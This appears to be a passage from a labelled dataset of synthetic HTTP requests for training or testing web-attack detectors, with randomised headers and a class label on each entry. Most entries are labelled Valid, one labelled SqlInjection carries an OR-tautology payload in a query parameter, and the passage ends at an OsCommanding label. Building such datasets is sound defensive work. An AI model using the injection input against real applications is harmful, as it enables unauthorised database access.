UA-Color: color16
UA-Pixels: 6622x661
Via: 4.5 16.171.227.92, e9ti/1.1 244.16.70.164
Transfer-Encoding: deflate
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 260 www.A5scBim.tiff "ipsfotscotanialawm" "Fri, 17 Sep 04 23:47:07 CET"
X-Forwarded-For: 21.6.131.96
X-Serial-Number: 9668437330474941
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31948
Start - Id: 10925
class: Valid
GET /knciI5Wt7PqQih7BHuj_/ei7q.NzBNllJIrrogvu/omMcuu2k4Li5cI@1fXwv/p93Hinsert2childNioyn/oUEiFWKveF5/nmqlu0G.tWif1/so2/44oedmtongws/CDScU/crEitifbheeoa.shtml?lrvaLwr4t=nyMbtADqDb&RN71IylJQIF=sincludelhv&FACadminJO.r=120&ifasaIosbndd=inesiChzn&oaieuhmncwvjud=i2AYWb-kTx61&ta=of%2Bhx%5Ds&erarlmarnlst=1703&bhrktjasg=r+netuyi+qolddroposf&fth=ov7%40jWPBX6v&emiD=noce&NtlWlYR=etuzn63c&ahtaccesX4h=54056800&Yqsdttorere=servicescat5Dznfienc7slha HTTP/1.0
Host: www.bseoaoEK5b.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: irScunda-o, i3et-at
Cache-Control: rinr='hvhnaoe'
Client-ip: 163.197.135.49
Cookie: efob=52922
Cookie2: $Version="60"
Date: Fri, 21 Sep 07 14:02:44 UTC
ETag: "Gxu@iATnyFDiSEWq"
Expect: 100-continue
From: dmnba@sipo.net
If-Modified-Since: Wed, 01 Dec 04 16:31:01 UTC
If-Unmodified-Since: Sat, 01 Apr 06 19:50:16 UTC
If-Match: "ZNSHrVIzYfEolBGDJ@Z"
If-None-Match: "AnHjA-TSneJrmmdgO-ba"
If-Range: Sun, 15 Nov 09 07:34:49 CET
Max-Forwards: 8
MIME-Version: 0.9
Pragma: Lstae='re'
Proxy-Authorization: tocs en3easx=cEno
Authorization: Basic OTd3dGw6dG9ldGJF
Range: 588592-19738,0954-52796,229852-
Referer: /nnaNaNr.php
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: trsaT/3.8.5.3.2
UA-CPU: PowerPC
UA-Disp: 7000,971,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5309x7001
Via: 0.6 www.ecaes.shtml, rtis/5.5 www.lymd1.tiff
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 191.57.65.52
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10925
Start - Id: 33688
class: Valid
POST /CA0If0adRCboot.iniVXc/qltoox2ouhrw1yA2ndiH/lR6@TZIZ-Eg/rqTozfAfmUK6et7P1F@7.js? HTTP/1.1
Content-Length: 277
Content-Language: l,gqob
Content-Encoding: gzip
Content-Location: /ueWttse.jpeg
Content-MD5: Q2Juc3IyaG9PZHR6WmJzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Feb 05 05:45:45 UTC
Last-Modified: Sat, 14 Aug 04 24:13:26 UTC
Host: www.os3lMr.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: nme9aOh-tudinOp;q=0.7, 0htf-dclrmm, ibmo-gsot, o-Tmu3gdeE;q=0.4, ye-eint14df;q=0.4
Cache-Control: max-age=6087
Client-ip: 141.37.41.90
Cookie: Gu7D-TQ8=26574655;zftppQdO6=rzaaraaohp0t4rga0Y
Cookie2: $Version="90"
Date: Thu, 20 Jan 05 19:14:07 UTC
ETag: "3EAe9ccRuWKgUN4WX"
Expect: gDnrHlx=eItc;ngraOse
From: rvteetoa@hiit.it
If-Modified-Since: Sat, 26 May 07 18:57:07 CET
If-Unmodified-Since: Mon, 17 Sep 07 04:43:03 CET
If-Match: *
If-None-Match: "qrcENO0K@_@9-Ic"
If-Range: "yBCOWYLOTBXK9p0L"
Max-Forwards: 5
MIME-Version: 1.7
Pragma: oEvsite=1hoiniii
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: Digest realm
Range: 016-7,68-
Referer: /sdtrnAnS/otabee0f/lrsaa9il/efd1.tar
TE: chunked;q=0.5
Trailer: TE
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 2.9; rr-at; rv:8.5.6) Gecko/22599588
UA-CPU: PowerPC
UA-Disp: 2201,8379,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 603x625
Via: 5.2 www.cnlw6mi.htm:187
Transfer-Encoding: identity
Upgrade: zssryR/6.5, ijnS/5.1, dEsf/4.2, Wss/3.6, Ktea/4.4
Warning: 255 20.208.58.243 "jso9tss" "Tue, 24 Oct 06 11:42:11 CET"
X-Forwarded-For: 134.44.228.236
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

mdbir=ibRzen;sre1<&wtimnrhucuoe=Sasti8T2rmhl&ttr=ce0a9reeiexOa&l1aenhaeaete=7&igM=processing-instructionEuT h ecL[twenulllformwna&ot8lQco=o9otnaLeTerish&IDrtu=tia&gu4m4=Dlxan8oi&id8esiadsteei=pKmz@tt1yWP&hdgie0ehs6pv= 8&siueAyeo=n|&4iqrs=en&btrd8tsw=djaerlgy/tbfetc

End - Id: 33688
Start - Id: 17546
class: Valid
GET /i0tgaosiueCir/t_W9@i/loipmirew33e.mdb? HTTP/1.0
Host: 52.210.247.204
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 130.134.24.111
Cookie: otmNoareaah=12;bgAformK=6;F6ekihlrnjmaeoh=671346;iu1i=(;mcnhNnaaass8=292
Cookie2: $Version="2"
Date: Wed, 11 Feb 09 11:56:58 GMT
ETag: W/"iFo9CpJUkkgfba_O"
Expect: 100-continue
From: noim@o36slone.be
If-Modified-Since: Fri, 29 Apr 05 20:43:18 UTC
If-Unmodified-Since: Mon, 23 Jul 07 18:00:58 CET
If-Match: *
If-None-Match: "_NfWMiAbZ0@arnrvEW0"
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: Basic ZWVodzpBOHRtbm5s
Range: -848823,71971-191917
Referer: http://www.eYmt.net/naiIy/QttaEoh/tr8us4n/hmircc.mp3
TE: chunked,gzip
Trailer: Authorization
User-Agent: adeCcez4Ox6c
UA-CPU: StrongARM
UA-Disp: 033,9220,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 845x6872
Via: FTP/0.5 176.163.69.98:52, HTTP/0.0 www.rnEs.jpeg, HTTP/3.9 51.96.224.245
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17546
Start - Id: 10117
class: Valid
GET /tcPx1GuE/zz4N/einojeoI3ajh/blog1dA/dI0/eB1tNtZKsUk3yAhl/yTxD7/qZTxgroup by/ntp1bay/img8O@-E8dropidQ5SN6/udl7ilxa5aarje.png?noordlVm=%27lptb&F3k6gPsXCmhj=i&hiltaihhilvc=sme6+4%3Epm8-ch&ml46lr7tuqwAs=2845&aWsnfln=qmAO&heor3e=165959&notittt03fnt=dxF2m&k1daO6ny=naOpdtohne2&jHU0c3Oe=%5Dwnph-kscoaeno%7E&aeF=v0kqD&De3mRkt=7&e8na2=e%3Dg&tietfe=mcJMdm7A&access_lognVNwp-RB4l=79 HTTP/1.1
Host: 155.146.204.203
Connection: close
Accept: */*;q=0.9
Accept-Charset: isiri-3342, cp-936;q=0.6, hz-gb-2312;q=0.6, x-mac-arabic;q=0.2, euc-cn
Accept-Encoding: compress;q=0.2, gzip, gzip
Accept-Language: *;q=0.6
Cache-Control: max-age=6
Client-ip: 184.118.181.119
Cookie: bsmmmEr=as>gepo t4isq;oedwhtrvanditos=etv3dao;cL4viFq.formSt=8693;6OMTfNQ17rW=85399
Cookie2: $Version="6"
Date: Wed, 25 Aug 04 06:33:00 CET
ETag: W/".ZjzzLEL@LsKuOAoF"
Expect: tjCfb
From: tsbr5seo@najlknme.it
If-Modified-Since: Mon, 22 Dec 08 16:02:52 UTC
If-Unmodified-Since: Thu, 10 Aug 06 16:29:35 UTC
If-Match: *
If-None-Match: "jpsJvAStILDq38dX7XS"
If-Range: Sat, 05 Jul 08 22:12:05 GMT
Max-Forwards: 873
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic ZHRzZTp0c29jY3lT
Authorization: Basic Y2VoVG5hWW46dHR1b25lb1Q=
Range: 308-,50-,44-
Referer: http://www.tfeWS.org/ifmnn.exe
TE: trailers,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: Lssudsnihitsnawe
UA-CPU: x86
UA-Disp: 755,453,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 117x256
Via: HTTP/0.9 247.117.57.195, 6.7 www.estr.shtml
Transfer-Encoding: gzip
Upgrade: ugRt/6.2
Warning: 552 www.aaeaertw.jpg:63657 "gasyeytit" 
X-Forwarded-For: 233.251.46.48
X-Serial-Number: 56711
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10117
Start - Id: 8455
class: Valid
GET /okJLgWqSjAcD/a0entE/obcycflnnd/pcm4.0/tpcjkejmt/sGPX64_.0Q/a0p8aute/e4YLEZwxDO9YELH0H.aspx?ek2=8445049&hetn4r3Eedmni=0493&es7lhi=4997 HTTP/1.1
Host: www.nnitos6sr.de
Connection: nse5l6o
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 24.119.33.158
Cookie: ePerh=rHk_Qv;rhsh8Uceyeie=375
Cookie2: $Version="241"
Date: Wed, 26 Nov 08 24:45:42 CET
ETag: "0Vhekwo1Ucfy05R-l"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Fri, 25 Jan 08 03:50:08 UTC
If-Unmodified-Since: Fri, 26 May 06 14:35:28 CET
If-Match: "tR@lwhiPt2zB@-C"
If-None-Match: "LhgfTU.iLfhpGbK@y"
If-Range: ".qt2_zPOxyoa1_du"
Max-Forwards: 64
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Basic Q3NybzphZWV0
Range: -41709
Referer: http://8SdXjb.st/eoean/ns5reNl.sh
TE: trailers,gzip,gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.9 (compatible; sdyrdsk4; SunOS sun4u; 2yf2homHrb)
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3083x039
Via: 9.0 154.81.116.230, 8.4 www.aythATez.gif
Transfer-Encoding: identity
Upgrade: eht/0.1, daroy/6.1, dh2hn/7.4, 6nar/5.6
Warning: 701 www.efiqn.jpg "h2nh5chdrzlef" "Mon, 14 Feb 05 17:53:20 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8455
Start - Id: 26639
class: Valid
GET /lfii/vinAln0toHr/OcgeoohE/o2SnfV_K/ilibn/nr6tosabDoineft/Rs0Z4JpwinntBGr/r@A.php4?jPan=hmr8&BliTtZU4@fNU=7connectf8mNomeartrrh8&t_d1f=md0q&olvli=4&aBYBMI5Ooimga=lSlsl&aaor=atJsD&eAAe8egK=3vgcdsRc%2F%2F0%2B1%26cktf HTTP/1.0
Host: www.faddjm.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish, euc-tw, euc-cn, x-mac-arabic;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 153.234.34.138
Cookie: Cno5asgeri6=24879218;nwrknol=qeyrCP3t5dh0lu4;IesleTnwesdatmd=048786
Cookie2: $Version="70"
Date: Wed, 01 Jul 09 02:52:32 GMT
ETag: W/"P3X1OeHkV9.rKn."
Expect: sg2O=Enidllp;nrltune
From: wduC@od60uuact.fr
If-Modified-Since: Sat, 30 Apr 05 03:58:58 GMT
If-Unmodified-Since: Mon, 06 Mar 06 07:28:37 GMT
If-Match: *
If-None-Match: "stxoqsG6jmaY8Lt8."
If-Range: "zpZKchUcrZfqXH8F1"
Max-Forwards: 157
MIME-Version: 5.1
Pragma: qcn=uoljy
Proxy-Authorization: NTLM NHRiZHJzb29Tc25lbnkzZG9lYWFKcmxlc2lyaXR0ZWV0bmFvc2Nhdg==
Authorization: Digest nonce
Range: 0-8818,879-
Referer: /rreazoS/eDio/d7ine/raxwus.cfm
TE: trailers
Trailer: Accept-Encoding
User-Agent: dr4a/8.9.9.7.0
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 7.4 www.i2nTat2r.html, HTTP/4.9 www.Ylwheieh.tiff
Transfer-Encoding: rsnne; rnteAeeO=vneigei
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26639
Start - Id: 29707
class: Valid
GET /nayn/Lptiodftzitr7pesgr/a74he/exz3YusxU.fkcjY37..9/c@0c@liXBW9/asajEa5e9swf6/ih/vPUQoza1/rdecindwkd2sxvrTlogc.tiff?a8=9340&dp6S=5423908567&rexecWD@tOn=nonUC3&ZEAF=6264701540&cri9osoThreZ=6&ndEagto=usnjrvVstgct HTTP/1.1
Host: 44.25.158.147
Connection: dogodP
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: chtnttvb-Or7o, emmyn-d0tnel
Cache-Control: ae=eN8
Client-ip: 39.47.126.79
Cookie: css=iUOsH-5
Cookie2: $Version="5"
Date: Fri, 04 Nov 05 07:07:30 CET
ETag: W/"_aRgGme7GWHFHjX0kj81"
Expect: ekfu=es1i;tet0D=rdov0e
From: nonai@Twda.it
If-Modified-Since: Sat, 10 Jul 04 20:39:53 GMT
If-Unmodified-Since: Fri, 23 Jan 09 18:33:35 GMT
If-Match: *
If-None-Match: "UH1Pf7JnluWqfPmiSB"
If-Range: Fri, 26 Jun 09 17:38:23 GMT
Max-Forwards: 113
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: NTLM aWR4bnR5dHJwb3RlZGxmd2dzb3VuaDljaG54MWhuZUVhYmh0Y29v
Range: -252619
Referer: /eiintbx/in1tmdso/eeiswc.jpg
TE: trailers,trailers
Trailer: Accept
User-Agent: gFTx1MjuW http://www.srlnDpa.be
UA-CPU: MIPS
UA-Disp: 162,5361,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 502x1724
Via: HTTP/1.3 www.dmt9uams.shtml, cSo2/3.5 www.iiiIeamy.gif:0
Transfer-Encoding: identity
Upgrade: astSl/2.7, K7osf/4.5, 7sQoel/8.0
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 2911766071168
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29707
Start - Id: 41899
class: SqlInjection
GET /rIo3fepi1hiy/Eaea24a1xtcsf/BchtbzADudto/tiG4NA2fpwDf_bFvxIt9/XMetc.jsp?Si=arard7etcdguzsmc&unRnYG5ee=fexDL9zhE7&aTisee=013754&3qs8erh9h0gnxni=usrexecpnBa&rQHGXgHHpwn=cadiltsyadsd&rfniefloen56=Ta-hgroup+by&rdvokorHebf2=idafu&beualradnS=eavQsEkh&ewasbdolqnhrgi=el&mrsmalAadk2hn=jj0aZ4Qrpv&tte9soLtRoeisSl=207&le=12501256&RQmD82R8T=%27++++OR++%27s%27%3D+++%27+++ HTTP/1.0
Host: 158.221.91.45
Connection: keep-alive
Accept: audio/x-wav, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5
Client-ip: 199.227.44.84
Cookie: 0lpizparenst=PlW;seumdh7n6YETyxt=dsel;unlpuTddeyYp=592656429
Cookie2: $Version="074"
Date: Fri, 24 Aug 07 02:02:28 UTC
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: sIrude@9fsh8tt.cz
If-Modified-Since: Sun, 25 Sep 05 15:26:55 UTC
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: "ewigRc4DfZXDz1krSjNV"
If-Range: *
Max-Forwards: 744
MIME-Version: 4.7
Pragma: Tso='qa2aisae'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest username="nruk"
Range: 814292-
Referer: /oo1o.cfm
TE: gzip,deflate;q=0.9,chunked;q=0.8
Trailer: TE
User-Agent: ittm7snr
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/4.6 172.53.55.129, Oft/8.5 www.ooghtst9.tiff, FTP/5.5 96.241.196.77
Transfer-Encoding: identity
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41899
Start - Id: 30377
class: Valid
GET /sjwSP/oleaaEhlinCetg823oq/rz-v8XILi/Dx/lFtfz6g7gdj/rFV40l/chF.bin?qXvarvobjectk=197&sdi2stqo3aip4Ha=eiDTt+&tTscNjrt=hh%27a+nfc HTTP/1.1
Host: 29.135.157.14
Connection: OmnCbbt
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-8, cp-932;q=0.4, iso-10646-ucs-2, hz-gb-2312;q=0.5, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 177.148.20.74
Cookie: usiRoeme1=4;ysoQvobnoTvs=ho;pius3pSrcn1=6590519545;f9xvdOoanh=(gkShttsw1s;cnewrgK=Uqlrmroleneb;bpSnZCc_=3152
Cookie2: $Version="63"
Date: Sun, 12 Aug 07 14:34:58 GMT
ETag: "3EIAijE5EvtBUf@9"
Expect: 100-continue
From: sfno39@ReecNnett.gov
If-Modified-Since: Sat, 28 Jun 08 16:37:08 UTC
If-Unmodified-Since: Sat, 15 Jan 05 17:36:41 GMT
If-Match: *
If-None-Match: *
If-Range: "BxmgI2x_taHLW6LYE5"
Max-Forwards: 5999
MIME-Version: 4.2
Pragma: a=ejstotma
Proxy-Authorization: ltwa aarnA=yustwx
Authorization: aryuo nNre=feeitwh
Range: 5-
Referer: http://www.pTI12.fr/rumecm6t.tar.gz
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 2.7; ue-08; rv:9.6.8) Gecko/16802833
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: mxeirw/2.5 www.wtofo2.css
Transfer-Encoding: gzip
Upgrade: bhHcwU/7.0, m4tay/8.3
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30377
Start - Id: 32050
class: Valid
GET /QGx3/sdfnen/pAqOUi/iZgroup byropenFyW-H7lC3/G5o9itneeVieej0/outpArs.cgi? HTTP/1.1
Host: 180.153.217.39
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: odoee-rbFsa, gt0-enlrn;q=0.5, lrcafott-tEzt, 1liioedc-r9;q=0.0
Cache-Control: max-stale
Client-ip: 162.82.152.35
Cookie: q2TU06havingMn=vusSr;.rKI4JK2pbody=eeooeB;Nq0e1ado=otVn-a7l%t;w.autoexecS6IycH=0j0nsneoi
Cookie2: $Version="7"
Date: Sat, 24 Nov 07 24:13:00 GMT
ETag: W/"h-9kpBabMMWH18w"
Expect: 100-continue
From: wNooie@yaieEicl.de
If-Modified-Since: Wed, 24 Aug 05 22:37:48 GMT
If-Unmodified-Since: Sun, 09 Dec 07 18:24:47 UTC
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: "h5ESyJVPy1ppMpgG@"
If-Range: Sat, 11 Jun 05 06:45:57 UTC
Max-Forwards: 7
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: Digest nc=dBc4eB20
Range: 23518-
Referer: http://www.s7n9e.gov/aexw/ht8n/0N0fi8he/tctl.mpg
TE: chunked;q=0.7,trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/5.2 (compatible; Konqueror/6.9; Linux i386; o4are8; udt3e8; tiaaot)
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: deflate
Upgrade: Leh/7.4, odi/8.1
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 158.151.229.231
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32050
Start - Id: 6950
class: Valid
POST /8eu3etnHt2narodm/sKXCCWIalmwY@LK3/SitehaUedaoR/rpajt/hdAea4g/afH1CUTsUwOfDgHQjWE.asmx? HTTP/1.1
Content-Length: 81
Content-Language: ahn7m,Ohs
Content-Encoding: gzip
Content-Location: http://www.qncet.cz/ee5oepa/gomThy5/tnolo.mspx
Content-MD5: QXFjZWh0cGVlYXNlOGYxdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 24:33:31 GMT
Last-Modified: Fri, 14 Aug 09 08:21:21 UTC
Host: 41.125.243.118
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-ce;q=0.1, isiri-3342;q=0.3, iso-8859-2, euc-jp
Accept-Encoding: 
Accept-Language: qE-nmOyiidJ;q=0.9, sfiecex3-hnml0dr, rhiaz8-dierltS;q=0.8, r-e, xnhz-elhihi;q=0.9
Cache-Control: max-stale=5193
Client-ip: 149.120.182.235
Cookie: Tkehe6nf=89tesmiteEq ljn;IawEueool=71004595;rtnItetleo=170973;Ihyyeew=5378;snaehethtnb=elstylev5uhorepo
Cookie2: $Version="3"
Date: Tue, 26 Jan 10 05:41:49 UTC
ETag: "Ugstsb8LTAN9nmu2"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Tue, 03 Feb 04 14:05:26 GMT
If-Unmodified-Since: Wed, 22 Mar 06 14:46:58 CET
If-Match: "0h7rcqVZ.2WbADt"
If-None-Match: *
If-Range: "fJPd.EtBtZoWAZ1DT"
Max-Forwards: 662
MIME-Version: 0.1
Pragma: eas='oaaeyci5'
Proxy-Authorization: Digest qop=auth
Authorization: cese6e 2rky=stme
Range: -35,310954-4,-65030
Referer: /Btrte0a7/io1a3T/tNaSeft/iereg/cens.tiff
TE: gzip;q=0.1
Trailer: If-Modified-Since
User-Agent: riKUdQy1Q http://www.ua9tgA.ch
UA-CPU: 68000
UA-Disp: 597,002,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4971x673
Via: taah/3.0 86.209.152.61:753, 8.7 242.189.144.174, HTTP/9.4 147.90.26.115:5925
Transfer-Encoding: gzip
Upgrade: g0aCH/9.9, nmc/8.5, eqhll/6.8
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nnjeg8Rg=xtermas&rahiaTomohlseg=tfabc&eEbmld=eeo&f2nphpimp=an&nihcvlzdnPr8=eymbOE

End - Id: 6950
Start - Id: 16984
class: Valid
GET /nvDPP6hmt/dkpmnernaldn8c/n0PxuTMl-T-fX.php4?eZ.mXwBTX-7xterm=Onnd&mh4sDr=n8WlyIxkm&edbysro2hw=4md&ueahi=57&kamdaloorb=atdnl&PrLtENmYFR=t4LJJm9rU5A&rtmewauGHw1=no&sBvbii5hgei=+gb6&eto53noy2m=dctJ&4erg8em=5&uatoeiitw=ehr5bapitT&oAnDatuifoisd=094164&uwH6rg9eeji=bes&A@26VRK8j=7&vWrDWLvnT=obtOb HTTP/1.0
Host: 216.23.199.241
Connection: keep-alive
Accept: image/*;q=0.3, audio/x-wav
Accept-Charset: x-mac-chinesetrad;q=0.2, windows-1255;q=0.1, iso-8859-1
Accept-Encoding: gzip;q=0.0, deflate
Accept-Language: *
Cache-Control: min-fresh=131
Client-ip: 33.165.112.95
Cookie: yi=245046965;s1=iazU1l;64ghavingrHf=aOGEEb;ZnjD=b6E;auii83ei=iwrogiNilrmet
Cookie2: $Version="12"
Date: Fri, 21 Sep 07 20:29:25 UTC
ETag: "L3sTip.hI8HQ1AYfMBWA"
Expect: cienreep
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Tue, 16 Jun 09 03:30:29 CET
If-Unmodified-Since: Sun, 26 Feb 06 15:48:08 CET
If-Match: "QR3_K@@IAqbumzRx"
If-None-Match: *
If-Range: Sun, 09 Apr 06 18:22:48 GMT
Max-Forwards: 9
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: 17583-
Referer: /TshnEp/aUgm/xnwstear.mdb
TE: trailers,trailers
Trailer: Date
User-Agent: ejpnoF http://www.xdw6bah.org
UA-CPU: x86
UA-Disp: 287,215,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 366x7717
Via: 2.5 47.87.215.96
Transfer-Encoding: compress
Upgrade: xInLof/6.3
Warning: 325 113.145.246.23:44456 "TcfseuxEeh6hlbirt" 
X-Forwarded-For: 86.116.223.77
X-Serial-Number: 44944819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16984
Start - Id: 28180
class: Valid
GET /eo3IkSjgC8o8/pr0/s@En9gvj/ja1rtsjld6a/wWKLo/erarTogsn/eithvtlaeoE/qmoenitloeeniu4d.msf?crhnoegeu=79832&oaawjUo9dAS=childofghaving&i2nxs=83&scro=0330828&ointaaa2l0=1 HTTP/1.1
Host: www.lat0a4ti.de:73
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 23.218.78.181
Cookie: l4ts769aolrnht=5765267;olisrhpokdc=2;htdtdoltaaoU2=bimgr5$operl;connect(aoNwhere;aeoct=84
Cookie2: $Version="0"
Date: Sat, 13 Mar 04 05:07:58 UTC
ETag: W/"K1yk45T0uxV_vV61LvP"
Expect: 100-continue
From: ncrto@gtaaei.be
If-Modified-Since: Wed, 04 Aug 04 15:38:25 UTC
If-Unmodified-Since: Sun, 20 Nov 05 10:03:52 UTC
If-Match: *
If-None-Match: *
If-Range: "JmH_o0bescFm-Pz2U"
Max-Forwards: 28
MIME-Version: 1.1
Pragma: lmCeIa=ceoejel
Proxy-Authorization: Digest realm
Authorization: rved6a nmSt=dNbe0
Range: -569,-376,5-
Referer: http://nolc0sms.fr/st49v/Plte/E3qsnsj/Ee5w.cgi
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: s1aus/8.9.0.7
UA-CPU: MIPS
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: 1.0 151.197.79.223, 7.4 www.HkswAn.js, 5.6 www.hrdh.png
Transfer-Encoding: identity
Upgrade: Stnpa/5.9, Fvmwd/0.5
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 7379357379156372061
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28180
Start - Id: 36723
class: OsCommanding
